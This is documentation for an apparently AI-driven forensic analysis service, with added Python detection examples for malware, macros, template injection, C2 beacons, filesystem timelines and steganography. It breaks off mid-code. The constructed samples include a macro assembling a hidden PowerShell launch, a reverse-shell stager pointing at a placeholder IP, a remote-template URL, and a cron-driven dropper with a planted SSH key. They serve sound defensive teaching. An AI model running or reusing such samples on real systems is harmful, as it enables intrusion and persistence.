Forensic Analysis
Overview
Fleet provides deep forensic analysis across multiple evidence types. Upload a file, describe what you need, and Fleet performs the analysis using industry-standard DFIR tools in its secure, isolated environment. All analysis outputs are saved to your workspace for download and further use.
Malware Reverse Engineering
Fleet performs comprehensive static analysis on executable files to identify capabilities, extract indicators, and assess threat levels.
Supported Formats
| Format | Description |
|---|---|
| PE (.exe, .dll, .sys) | Windows Portable Executable files |
| ELF | Linux executable files |
| .NET assemblies | Managed code executables and libraries |
| Shellcode | Raw machine code payloads |
| Packed binaries | UPX, Themida, ASPack, and other packers |
Analysis Capabilities
PE and ELF Analysis:
- File header inspection (compilation timestamp, entry point, subsystem, linker version)
- Section analysis with entropy measurement to detect encryption, compression, or packing
- Import and export table analysis with flagging of suspicious API calls (process injection, credential access, networking, anti-analysis)
- String extraction and classification: URLs, IP addresses, registry keys, file paths, encoded data, mutex names
- Resource and overlay data inspection
- Packer detection and identification
- Disassembly of functions and code flow analysis
Example prompt:
Perform static analysis on the attached PE binary. Deliver: capability summary, IOC table with hashes and network indicators, risk level with reasoning, and MITRE ATT&CK mapping.
.NET Assembly Analysis:
- CLR metadata extraction (framework version, entry point, assembly references)
- Full decompilation to C# source code for understanding what the code actually does
- Deobfuscation of protected assemblies (SmartAssembly and similar protectors)
- String decryption routine identification and automated decryption
- Obfuscation technique identification (name mangling, control flow obfuscation, resource encryption)
Example prompt:
Deobfuscate the attached .NET assembly and show me the decompiled C# source code. Identify what the malware does and extract all IOCs.
Shellcode Analysis:
- Encoding/encryption scheme identification (XOR, rolling XOR, Base64, custom ciphers)
- Automated key brute-forcing and decoding
- Disassembly with function call identification
- API resolution analysis (hash-based dynamic API loading)
- Purpose classification: downloader, reverse shell, stager, or full payload
- IOC extraction from decoded shellcode
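The key brute-forcing and purpose classification steps above, as an added example that is not Fleet's code: every single-byte and rolling-XOR key is tried, each candidate is scored by the API and library strings a Windows stager has to carry in clear text, and the best decode is classified. The shellcode blob is a constructed string table (no machine code), and the marker lists are this example's own assumptions about what a stager contains.

```python
"""Added example (not Fleet's code): brute-force single-byte and rolling-XOR keys on
an encoded shellcode blob, score candidates by marker strings, classify the result.
The sample blob is constructed for the demo."""

# Strings that decoded stager/loader shellcode commonly carries in clear text (assumed list).
MARKERS = (b"kernel32", b"LoadLibrary", b"GetProcAddress", b"ws2_32", b"connect",
           b"WinExec", b"cmd.exe", b"http")


def xor_rolling(data: bytes, key: int, step: int) -> bytes:
    """XOR with a key that advances by `step` (mod 256) after every byte.
    step == 0 is plain single-byte XOR. Applying the same (key, step) twice decodes."""
    out, k = bytearray(), key
    for b in data:
        out.append(b ^ k)
        k = (k + step) & 0xFF
    return bytes(out)


def brute_force(blob: bytes, max_step: int = 8):
    """Try every key for step 0..max_step and keep the candidate with the most
    marker hits. Returns None if no (key, step) pair yields a single marker."""
    best = None
    for step in range(max_step + 1):
        for key in range(256):
            plain = xor_rolling(blob, key, step)
            hits = sum(1 for m in MARKERS if m in plain)
            if hits and (best is None or hits > best["hits"]):
                best = {"scheme": "single-byte xor" if step == 0 else "rolling xor",
                        "key": key, "step": step, "hits": hits, "plain": plain}
    return best


def classify(plain: bytes) -> str:
    """Coarse purpose classification from the APIs and strings present."""
    if any(m in plain for m in (b"InternetOpen", b"URLDownloadToFile", b"WinHttp", b"http")):
        return "downloader"
    if any(m in plain for m in (b"ws2_32", b"WSASocket", b"connect")):
        return "reverse shell / stager"
    if any(m in plain for m in (b"WinExec", b"cmd.exe", b"CreateProcess")):
        return "command execution"
    return "unknown"


# Constructed stand-in for a reverse-shell stager's string table; a real blob
# would carry machine code around these strings.
SAMPLE_PLAIN = (b"\x90" * 8 + b"kernel32.dll\0ws2_32.dll\0WSASocketA\0connect\0"
                b"203.0.113.50\0" + (8443).to_bytes(2, "big") + b"\0cmd.exe\0")
SAMPLE_BLOB = xor_rolling(SAMPLE_PLAIN, 0x4B, 3)   # key 0x4B, advancing by 3 per byte

if __name__ == "__main__":
    hit = brute_force(SAMPLE_BLOB)
    print(hit["scheme"], hex(hit["key"]), "step", hit["step"], "->", classify(hit["plain"]))
```

Scoring on marker strings rather than printable ratio matters for rolling keys: a wrong (key, step) pair can still produce a few printable bytes by chance, but it will not reproduce an eight-byte library name. Hash-based API resolution leaves none of these strings behind, which is why the page lists it as a separate analysis step.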
Example prompt:
Decode the attached shellcode, identify the encryption scheme, and classify its purpose.
Packed Malware:
- Packer identification (UPX, Themida, ASPack, custom packers)
- Entropy-based packing detection
- Side-by-side comparison of packed vs. unpacked variants
- Capability delta analysis showing what packing conceals
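The section-entropy measurement from the PE analysis list and the entropy-based packing detection above, as one added example that is not Fleet's code: it walks the PE section table by hand, computes Shannon entropy per section, and combines that with packer-specific section names. The PE image is constructed in memory (valid headers, no code), and the packer section-name table is a partial list assumed for the demo.

```python
"""Added example (not Fleet's code): walk a PE section table and score each
section's Shannon entropy; high-entropy code sections and packer-named sections
are the two cheap packing signals. The sample image is constructed in memory."""
import math
import random
import struct


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_sections(pe: bytes):
    """Yield (name, raw_bytes) per section: MZ -> e_lfanew -> "PE\\0\\0" -> COFF
    header (20 bytes) -> optional header -> 40-byte section headers."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    for i in range(num_sections):
        hdr = table + i * 40
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        size_raw, ptr_raw = struct.unpack_from("<II", pe, hdr + 16)
        yield name, pe[ptr_raw:ptr_raw + size_raw]


# Section names that identify a packer outright (partial list, assumed for this demo).
PACKER_SECTIONS = {"UPX0": "UPX", "UPX1": "UPX", "UPX2": "UPX", ".aspack": "ASPack", ".adata": "ASPack"}


def assess_packing(pe: bytes, threshold: float = 7.0) -> dict:
    """Per-section entropy plus a verdict. .rsrc is excluded from the entropy
    signal because it legitimately holds compressed images and fonts."""
    sections, high, packer = [], [], None
    for name, data in pe_sections(pe):
        h = round(shannon_entropy(data), 2)
        sections.append((name, len(data), h))
        if h >= threshold and name.lower() != ".rsrc":
            high.append(name)
        packer = packer or PACKER_SECTIONS.get(name)
    return {"sections": sections, "high_entropy": high, "packer_hint": packer,
            "likely_packed": bool(high) or packer is not None}


def build_sample_pe(sections) -> bytes:
    """Constructed minimal PE32: valid headers and section table, no runnable code."""
    opt_size = 224
    hdr_len = (0x40 + 4 + 20 + opt_size + 40 * len(sections) + 0x1FF) & ~0x1FF  # 512-byte alignment
    mz = bytearray(0x40)
    mz[:2] = b"MZ"
    struct.pack_into("<I", mz, 0x3C, 0x40)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    table, blob, ptr = bytearray(), bytearray(), hdr_len
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), 0x1000, len(data), ptr, 0, 0, 0, 0, 0x60000020)
        blob += data
        ptr += len(data)
    headers = bytes(mz) + b"PE\0\0" + coff + bytes(opt) + bytes(table)
    return headers.ljust(hdr_len, b"\0") + bytes(blob)


SAMPLE_PE = build_sample_pe([
    (".text", bytes(range(16)) * 256),            # 16-symbol alphabet: exactly 4.0 bits/byte
    ("UPX1", random.Random(7).randbytes(4096)),   # random bytes: about 7.95 bits/byte
])

if __name__ == "__main__":
    print(assess_packing(SAMPLE_PE))
```

Two caveats a practitioner applies when reading the output: a 7.0 bits/byte threshold catches compressed or encrypted payloads but also legitimately compressed resources (hence the .rsrc exclusion), and packer section names are trivially renamed, so a missing name means nothing while a present one is a strong hint.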
Example prompt:
Compare the packed and unpacked variants in the attached archive. Show me what the packing hides.
Output
Malware analysis produces structured reports including:
- File metadata and hashes (MD5, SHA1, SHA256)
- Capability assessment with confidence levels
- IOC table (network indicators, file indicators, behavioral indicators)
- MITRE ATT&CK technique mapping
- Risk level with supporting evidence
- Recommended response actions
Document Analysis
Fleet investigates documents for embedded threats, malicious macros, and hidden payloads.
Supported Formats
| Format | Description |
|---|---|
| Word (.doc, .docx, .docm) | Microsoft Word documents, including macro-enabled |
| Excel (.xls, .xlsx, .xlsm) | Microsoft Excel spreadsheets, including macro-enabled |
| PowerPoint (.ppt, .pptx) | Microsoft PowerPoint presentations |
| PDF | Portable Document Format |
| RTF | Rich Text Format |
| OLE | Object Linking and Embedding compound files |
| CAB | Cabinet archive files |
Analysis Capabilities
VBA Macro Analysis:
- Macro extraction from Office documents
- Deobfuscation of encoded macros (Base64, character code chains, string concatenation, string reversal, environment variable abuse)
- Auto-execution trigger identification (AutoOpen, Document_Open, Document_Close, Workbook_Open)
- Full execution chain tracing: what the macro does step by step
- Payload download and execution identification
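The trigger identification and the deobfuscation of character-code chains, string concatenation and string reversal above, as an added example that is not Fleet's code: it folds the obfuscation layers into literals, traces string variables line by line so the assembled command becomes visible, and lists the auto-execution entry points. The macro is a constructed sample; the trigger and suspicious-call lists are this example's own.

```python
"""Added example (not Fleet's code): find auto-execution triggers in VBA source and
undo Chr() chains, "a" & "b" concatenation and StrReverse while tracing string
variables so the final command is visible. The macro is a constructed sample."""
import re

AUTOEXEC = ("AutoOpen", "AutoExec", "AutoClose", "Auto_Open", "Auto_Close",
            "Document_Open", "Document_Close", "Workbook_Open")
SUSPICIOUS = {"CreateObject": r"CreateObject\(", "WScript.Shell": r"WScript\.Shell",
              "Run": r"\.Run\b", "Shell": r"\bShell\(", "powershell": r"powershell",
              "URLDownloadToFile": r"URLDownloadToFile"}


def fold_literals(code: str) -> str:
    """Rewrite Chr(n), StrReverse("...") and adjacent "a" & "b" into one literal.
    (Chr(34) would yield a bare quote; a production version must escape it.)"""
    code = re.sub(r"Chr\((\d+)\)", lambda m: '"%s"' % chr(int(m.group(1))), code)
    code = re.sub(r'StrReverse\("([^"]*)"\)', lambda m: '"%s"' % m.group(1)[::-1], code)
    prev = None
    while prev != code:   # repeat until no adjacent literal pair is left
        prev, code = code, re.sub(r'"([^"]*)"\s*&\s*"([^"]*)"', r'"\1\2"', code)
    return code


def split_concat(expr: str) -> list:
    """Split on '&' outside string literals."""
    parts, cur, in_str = [], "", False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch == "&" and not in_str:
            parts.append(cur)
            cur = ""
        else:
            cur += ch
    parts.append(cur)
    return [p.strip() for p in parts]


def trace_assignments(code: str) -> dict:
    """Evaluate `name = <literals & variables>` lines top to bottom."""
    env = {}
    for line in code.splitlines():
        m = re.match(r"\s*(\w+)\s*=\s*(.+?)\s*$", line)
        if not m:
            continue
        name, expr = m.groups()
        value = ""
        for part in split_concat(expr):
            if len(part) >= 2 and part[0] == part[-1] == '"':
                value += part[1:-1]
            elif part in env:
                value += env[part]
            else:
                value += "<%s>" % part   # call or unknown symbol: left symbolic
        env[name] = value
    return env


def analyze_macro(code: str) -> dict:
    folded = fold_literals(code)
    env = trace_assignments(folded)
    haystack = folded + "\n" + "\n".join(env.values())
    return {
        "triggers": [t for t in AUTOEXEC if re.search(r"\bSub\s+%s\b" % t, code)],
        "variables": env,
        "suspicious": sorted(k for k, pat in SUSPICIOUS.items() if re.search(pat, haystack, re.I)),
        "deobfuscated": folded,
    }


SAMPLE_VBA = r'''
Private Sub Document_Open()
    Dim s As String
    s = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & "shell"
    s = s & " -w hid" & "den -c " & StrReverse("'exe.live\pmet\:c' tratS")
    Set w = CreateObject("WScript.Shell")
    w.Run s, 0
End Sub
'''

if __name__ == "__main__":
    result = analyze_macro(SAMPLE_VBA)
    print(result["triggers"], result["suspicious"])
    print(result["variables"])
```

Searching for suspicious calls in the traced variable values as well as the folded source is what catches `powershell` here: the word never appears in the macro text, only in the string the macro assembles at run time.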
Embedded Object Detection:
- OLE object inspection
- ActiveX control detection
- DDE (Dynamic Data Exchange) field analysis
- External template injection detection (T1221) with URL extraction from OOXML relationships
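The external template injection check above (T1221, URL extraction from OOXML relationships), as an added example that is not Fleet's code: every `.rels` part in the package is parsed and each relationship with `TargetMode="External"` is reported, with an `attachedTemplate` relationship flagged as the injection primitive. The `.docx` is constructed in memory from the minimum set of parts, so the check runs offline; the URLs are placeholders.

```python
"""Added example (not Fleet's code): detect remote template injection (ATT&CK T1221)
by listing every relationship in an OOXML package that points outside the package.
The .docx below is constructed in memory so the check runs offline."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
TEMPLATE_REL = OFFICE_REL + "attachedTemplate"


def external_relationships(docx: bytes) -> list:
    """Every Relationship with TargetMode="External" in any *.rels part.
    An external attachedTemplate is the template-injection primitive; external
    hyperlinks and oleObjects are reported too, so the analyst sees all of them."""
    out = []
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        for part in sorted(z.namelist()):
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode") != "External":
                    continue
                rtype = rel.get("Type", "")
                out.append({"part": part, "type": rtype.rsplit("/", 1)[-1],
                            "target": rel.get("Target"),
                            "template_injection": rtype == TEMPLATE_REL})
    return out


def verdict(docx: bytes) -> str:
    rels = external_relationships(docx)
    if any(r["template_injection"] for r in rels):
        return "malicious: remote template injection"
    return "suspicious: external references present" if rels else "no external references"


def build_sample_docx(template_url: str) -> bytes:
    """Constructed minimal .docx: an external attachedTemplate in settings.xml.rels
    (the malicious pattern) next to an ordinary external hyperlink (benign pattern)."""
    rels = '<Relationships xmlns="%s">%s</Relationships>'
    wml = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("_rels/.rels", rels % (REL_NS,
                   '<Relationship Id="rId1" Type="%sofficeDocument" Target="word/document.xml"/>' % OFFICE_REL))
        z.writestr("word/document.xml", '<w:document xmlns:w="%s"><w:body/></w:document>' % wml)
        z.writestr("word/_rels/document.xml.rels", rels % (REL_NS,
                   '<Relationship Id="rId5" Type="%shyperlink" Target="https://example.com/" TargetMode="External"/>' % OFFICE_REL))
        z.writestr("word/settings.xml",
                   '<w:settings xmlns:w="%s" xmlns:r="%s"><w:attachedTemplate r:id="rId1"/></w:settings>'
                   % (wml, OFFICE_REL[:-1]))
        z.writestr("word/_rels/settings.xml.rels", rels % (REL_NS,
                   '<Relationship Id="rId1" Type="%s" Target="%s" TargetMode="External"/>' % (TEMPLATE_REL, template_url)))
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("http://203.0.113.50/normal.dotm")
    for finding in external_relationships(sample):
        print(finding)
    print(verdict(sample))
```

The document body is empty and contains no macro, which is exactly why this technique survives a macro scan: the payload lives in whatever the remote `.dotm` serves when Word fetches it at open time.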
PDF Analysis:
- JavaScript extraction and deobfuscation
- Embedded file detection
- URL and action extraction
- Metadata analysis (author, creation date, modification date, producer)
- Suspicious structure identification
Metadata Extraction:
- Author, creation and modification timestamps
- Template information
- Last saved by
- Revision count and editing time
Example prompts:
Analyze the attached Word document for malicious macros. Deobfuscate any encoded content and trace the full execution chain.
Check this PDF for embedded JavaScript, hidden URLs, and suspicious actions.
This Word document appears clean but might use template injection. Analyze the OOXML relationships for external template references.
Output
Document analysis produces:
- Deobfuscated macro code (if present)
- Full execution chain description
- Extracted IOCs (URLs, IPs, domains, file hashes)
- Social engineering tactic assessment
- MITRE ATT&CK mapping
- Verdict (malicious, suspicious, or benign) with confidence level
Network Forensics
Fleet analyzes network captures to identify malicious activity, command-and-control communication, and data exfiltration.
Supported Formats
| Format | Description |
|---|---|
| PCAP | Packet capture files |
| PCAPNG | Next-generation packet capture files |
Analysis Capabilities
Protocol Analysis:
- Protocol breakdown with distribution statistics
- Per-protocol deep inspection (DNS, HTTP, HTTPS/TLS, SMTP, FTP, SMB)
- Connection summary with top talkers (source and destination IPs)
- Port usage analysis
DNS Analysis:
- Complete DNS query extraction
- Suspicious domain identification
- DNS tunneling detection (high-entropy subdomain queries, unusual query volumes)
- Domain reputation assessment
HTTP/HTTPS Analysis:
- URL extraction and classification
- User agent analysis
- POST data inspection
- File download detection and extraction
- TLS certificate inspection (issuer, subject, validity, self-signed detection)
C2 Detection:
- Beacon pattern identification (regular intervals, jitter analysis)
- Connections to unusual ports
- High-entropy data transfers indicating encrypted C2 channels
- Known C2 framework signature detection
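The beacon pattern identification above (regular intervals with jitter analysis), as an added example that is not Fleet's code: connection events are grouped per flow and the coefficient of variation of their inter-arrival gaps is used as the jitter estimate, which separates a 60-second beacon with 10% jitter from interactive browsing. The event list is constructed; the IPs are documentation addresses. In practice the events would be pulled from the capture, for example with `tshark -r capture.pcap -T fields -e frame.time_epoch -e ip.src -e ip.dst -e tcp.dstport`.

```python
"""Added example (not Fleet's code): rank flows by timing regularity to surface
C2 beacons. The connection events are constructed; a real run would take them
from tshark output over the PCAP."""
import random
import statistics


def beacon_candidates(events, min_count: int = 8, max_jitter: float = 0.3) -> list:
    """events: iterable of (epoch_seconds, src, dst, dport).
    Per flow, the coefficient of variation (stdev / mean) of the gaps between
    connections is the jitter estimate: interactive traffic has wildly varying
    gaps, a beacon with 10% jitter lands around 0.06. Most regular flows first."""
    by_flow = {}
    for ts, src, dst, dport in events:
        by_flow.setdefault((src, dst, dport), []).append(float(ts))
    out = []
    for flow, times in by_flow.items():
        if len(times) < min_count:          # too few samples to call anything periodic
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean, sd = statistics.mean(gaps), statistics.pstdev(gaps)
        cv = sd / mean if mean else float("inf")
        out.append({"flow": flow, "count": len(times), "interval_s": round(mean, 1),
                    "jitter": round(cv, 3), "beacon": cv <= max_jitter})
    return sorted(out, key=lambda r: r["jitter"])


def _constructed_events() -> list:
    rng = random.Random(3)
    ev, t = [], 1_700_000_000.0
    for _ in range(20):                                   # C2 beacon: 60 s +/- 10% jitter
        t += 60 + rng.uniform(-6, 6)
        ev.append((t, "10.0.0.12", "203.0.113.50", 443))
    t = 1_700_000_000.0
    for gap in (2, 45, 1, 130, 7, 0.5, 300, 3, 22, 9, 60, 1):   # interactive browsing
        t += gap
        ev.append((t, "10.0.0.12", "198.51.100.7", 443))
    for t in (1_700_000_100.0, 1_700_000_400.0, 1_700_001_000.0):  # too few to judge
        ev.append((t, "10.0.0.12", "192.0.2.9", 8080))
    return ev


SAMPLE_EVENTS = _constructed_events()

if __name__ == "__main__":
    for row in beacon_candidates(SAMPLE_EVENTS):
        print(row)
```

The `min_count` floor is the main false-positive control: with three or four connections almost any flow looks periodic. Frameworks that sleep for long, randomised intervals push the coefficient of variation above the threshold on purpose, which is why the page pairs this check with signature-based C2 detection rather than relying on timing alone.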
Exfiltration Detection:
- Unusual outbound data volumes
- Data staging patterns
- DNS exfiltration (encoded data in DNS queries)
- Encrypted channel analysis
Example prompts:
Analyze the attached PCAP for C2 communication and data exfiltration indicators.
Extract all DNS queries from this PCAP and flag any suspicious domains.
Identify beacon patterns in this network capture and determine the C2 interval.
Output
Network forensics produces:
- Protocol statistics and connection summary
- Extracted IOCs (IPs, domains, URLs, user agents)
- Suspicious findings with evidence
- Exported HTTP objects (downloaded files)
- Threat assessment with confidence levels
Host Forensics
Fleet performs system-level forensic analysis within its secure environment on the artifacts you upload; it does not connect to live hosts (see Limitations).
Capabilities
Filesystem Timeline:
- Reconstruct file modification history over configurable time windows
- Focus on IR-relevant directories: system configuration, temporary directories, log files, scheduled tasks, binary directories, user home directories
- File classification by type and risk level
- Suspicious pattern flagging:
- New executables in temporary directories
- Modified authentication configurations (passwd, shadow, sudoers)
- Altered or cleared log files
- Hidden files and directories
- SUID/SGID permission changes
- Recently added cron entries or SSH authorized keys
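The filesystem timeline and the suspicious-pattern flags above, as an added example that is not Fleet's code: it walks the IR-relevant directories of a mounted image root, keeps files modified inside the time window, and attaches the flags listed above to each entry. The directory lists and the dotfile allowlist are this example's own assumptions, the mini root filesystem is constructed in a temporary directory, and Linux path separators are assumed.

```python
"""Added example (not Fleet's code): build a modification timeline over IR-relevant
directories of a mounted image and flag suspicious patterns. The mini root
filesystem is constructed in a temp directory so the example runs anywhere."""
import os
import stat
import tempfile
import time

FOCUS = ("etc", "tmp", "var/tmp", "dev/shm", "var/log", "var/spool/cron",
         "home", "root", "usr/bin", "usr/sbin", "usr/local/bin")
TEMP_DIRS = ("tmp/", "var/tmp/", "dev/shm/")
AUTH_FILES = {"passwd", "shadow", "sudoers", "authorized_keys"}
KNOWN_DOTFILES = {".bashrc", ".profile", ".bash_logout", ".bash_history", ".ssh", ".cache", ".config", ".local"}
EXEC_BITS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH


def flags_for(rel: str, st: os.stat_result) -> list:
    """rel is the path relative to the image root, e.g. 'etc/passwd'."""
    name, flags = os.path.basename(rel), []
    if rel.startswith(TEMP_DIRS) and st.st_mode & EXEC_BITS:
        flags.append("executable in temp dir")
    if name in AUTH_FILES or rel.startswith("etc/sudoers.d/"):
        flags.append("auth config modified")
    if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
        flags.append("suid/sgid")
    if any(p.startswith(".") and p not in KNOWN_DOTFILES for p in rel.split("/")):
        flags.append("hidden path")
    if rel.startswith(("etc/cron", "var/spool/cron")):
        flags.append("cron entry")
    if rel.startswith("var/log/") and st.st_size == 0:
        flags.append("log file emptied")
    return flags


def build_timeline(root: str, since: float) -> list:
    """Files under FOCUS modified at or after `since` (epoch seconds), oldest first.
    lstat is used so symlinks are recorded as themselves, not followed."""
    rows = []
    for top in FOCUS:
        for dirpath, _dirs, files in os.walk(os.path.join(root, top)):
            for fn in files:
                full = os.path.join(dirpath, fn)
                try:
                    st = os.lstat(full)
                except OSError:
                    continue
                if st.st_mtime < since:
                    continue
                rel = os.path.relpath(full, root)
                rows.append({"mtime": st.st_mtime, "path": "/" + rel, "flags": flags_for(rel, st)})
    return sorted(rows, key=lambda r: r["mtime"])


def build_sample_root() -> str:
    """Constructed mini image: one stale file and five recent, suspicious ones."""
    root, now = tempfile.mkdtemp(prefix="timeline-demo-"), time.time()

    def put(rel, data=b"x", mode=0o644, age_s=0):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as fh:
            fh.write(data)
        os.chmod(p, mode)
        os.utime(p, (now - age_s, now - age_s))

    put("etc/hostname", b"ws01\n", age_s=30 * 86400)          # outside a 48 h window
    put("etc/passwd", b"root:x:0:0::/root:/bin/bash\nsvc:x:0:0::/:/bin/sh\n", age_s=3600)
    put("tmp/.x/updater", b"\x7fELF", mode=0o755, age_s=600)
    put("var/log/auth.log", b"", age_s=300)
    put("home/alice/.ssh/authorized_keys", b"ssh-ed25519 AAAA... attacker\n", age_s=120)
    put("etc/cron.d/sync", b"* * * * * root /tmp/.x/updater\n", age_s=100)
    return root


def demo(window_hours: float = 48) -> list:
    """Timeline of the constructed root over the last `window_hours`."""
    return build_timeline(build_sample_root(), time.time() - window_hours * 3600)


if __name__ == "__main__":
    for row in demo():
        print(time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(row["mtime"])), row["path"], row["flags"])
```

Reading the result in mtime order is the point of a timeline: a second root-UID account in `passwd`, an ELF dropped in a hidden `/tmp` directory, an emptied `auth.log`, a new authorized key and a cron entry that re-runs the dropper line up as one sequence rather than five unrelated findings. Note that mtime alone can be set by an attacker; on a real image the same walk over ctime, which `touch` cannot rewrite, is the cross-check.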
Rootkit Detection:
- System-level rootkit scanning
- Hidden process detection
- Kernel module inspection
- File integrity verification
System Auditing:
- Configuration review
- Service and process enumeration
- Network connection analysis
- User account and privilege review
Example prompt:
Create a forensic timeline of files modified in the last 48 hours, focusing on /etc, /tmp, /var/log, and home directories. Flag anything suspicious.
Disk and Memory Forensics
Fleet can analyze disk images and memory dumps uploaded to the workspace.
Disk Image Analysis
Supported formats: RAW, E01, VMDK, VHD/VHDX.
Capabilities:
- Partition layout analysis
- File system browsing and file recovery
- Deleted file recovery
- File carving from unallocated space
- Timeline generation from filesystem metadata
Memory Dump Analysis
Capabilities:
- Process listing and analysis
- Network connection enumeration
- Malware detection in memory (code injection, hollowed processes, suspicious memory regions)
- DLL and module listing
- Registry hive extraction from memory
Example prompt:
Analyze this memory dump. List all running processes, identify any injected code, and extract network connections.
Cryptographic and Steganographic Analysis
Password Cracking
Fleet can attempt to crack password-protected archives using common malware analysis passwords (infected, malware, virus) and custom wordlists or patterns.
Example prompt:
The attached ZIP is password-protected using the format "infected_YYYYMMDD". Crack it and extract the contents.
Steganography Detection
Fleet analyzes images for hidden data using multiple detection methods:
- LSB (Least Significant Bit) analysis
- EOF (End of File) marker inspection for appended data
- Known steganography tool signature detection (Steghide, OpenStego, and others)
- Entropy analysis across image regions to identify areas with unusual randomness
- Attempted extraction of detected hidden content
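The EOF inspection, LSB analysis, entropy-style randomness check and extraction attempt above, as an added example that is not Fleet's code: it reports bytes appended after the PNG `IEND` chunk, splits the least-significant-bit plane into blocks and flags blocks that refuse to compress (the footprint of an encrypted payload), and tries to decode the plane as text. The four images are constructed in memory (a smooth gradient cover, the same cover with a text payload, with a random payload standing in for an encrypted one, and with a file appended); the minimal PNG reader and writer handle only the 8-bit RGB, filter-0 subset the demo emits.

```python
"""Added example (not Fleet's code): appended-data, LSB-plane randomness and
LSB-extraction checks on PNG images. All images are constructed in memory."""
import random
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(tag: bytes, payload: bytes) -> bytes:
    return struct.pack(">I", len(payload)) + tag + payload + struct.pack(">I", zlib.crc32(tag + payload))


def write_png(w: int, h: int, rgb: bytes) -> bytes:
    """8-bit RGB, filter type 0 on every scanline (enough for the demo)."""
    raw = b"".join(b"\0" + rgb[y * w * 3:(y + 1) * w * 3] for y in range(h))
    return (PNG_SIG + _chunk(b"IHDR", struct.pack(">IIBBBBB", w, h, 8, 2, 0, 0, 0))
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


def read_png(data: bytes):
    """Returns (w, h, rgb_bytes, bytes_after_IEND). Only the subset write_png emits."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, w, h = 8, b"", 0, 0
    while pos + 8 <= len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        pos += 12 + length                       # length + tag + payload + crc
        if tag == b"IHDR":
            w, h, depth, ctype = struct.unpack(">IIBB", payload[:10])
            if (depth, ctype) != (8, 2):
                raise ValueError("demo parser handles 8-bit RGB only")
        elif tag == b"IDAT":
            idat += payload
        elif tag == b"IEND":
            break                                # anything left after this is foreign
    raw, stride = zlib.decompress(idat), w * 3 + 1
    if any(raw[y * stride] != 0 for y in range(h)):
        raise ValueError("demo parser handles filter type 0 only")
    rgb = b"".join(raw[y * stride + 1:(y + 1) * stride] for y in range(h))
    return w, h, rgb, data[pos:]


def lsb_embed(rgb: bytes, payload: bytes) -> bytes:
    """Sequential LSB embedding, MSB of each payload byte first (how simple tools do it)."""
    out = bytearray(rgb)
    for i, bit in enumerate("".join(format(b, "08b") for b in payload)):
        out[i] = (out[i] & 0xFE) | int(bit)
    return bytes(out)


def lsb_plane(rgb: bytes) -> bytes:
    """Pack the LSB of every sample into bytes; undoes lsb_embed's bit order."""
    return bytes(int("".join(str(b & 1) for b in rgb[i:i + 8]), 2)
                 for i in range(0, len(rgb) - 7, 8))


def analyze_image(png: bytes, block: int = 256) -> dict:
    """Three indicators: trailing bytes after IEND; LSB-plane blocks that do not
    compress (random-looking bits, what encrypted payloads leave behind; a noisy
    photo also trips this, hence probabilistic); and the LSB plane decoding to text."""
    w, h, rgb, trailing = read_png(png)
    plane = lsb_plane(rgb)
    ratios = [len(zlib.compress(plane[i:i + block], 9)) / block
              for i in range(0, len(plane) - block + 1, block)]
    random_blocks = [i for i, r in enumerate(ratios) if r >= 0.9]
    head = plane[:64]
    printable = sum(0x20 <= b < 0x7F for b in head) / len(head)
    extracted = head if printable >= 0.9 else None
    findings = []
    if trailing:
        findings.append("%d bytes appended after IEND, starts %r" % (len(trailing), trailing[:4]))
    if random_blocks:
        findings.append("random-looking LSB plane in blocks %s" % random_blocks)
    if extracted:
        findings.append("LSB plane decodes to text: %r" % extracted[:40])
    return {"size": (w, h), "findings": findings, "lsb_random_blocks": random_blocks,
            "extracted": extracted, "trailing_bytes": len(trailing)}


def _cover(w: int = 64, h: int = 64) -> bytes:   # constructed smooth gradient, low LSB noise
    return bytes((x + y) // 4 for y in range(h) for x in range(w) for _ in range(3))


COVER = _cover()
CLEAN_PNG = write_png(64, 64, COVER)
TEXT_STEGO_PNG = write_png(64, 64, lsb_embed(
    COVER, b"Constructed demo payload: staging host 203.0.113.50:8443, key rotates daily."))
RANDOM_STEGO_PNG = write_png(64, 64, lsb_embed(COVER, random.Random(5).randbytes(512)))  # encrypted stand-in
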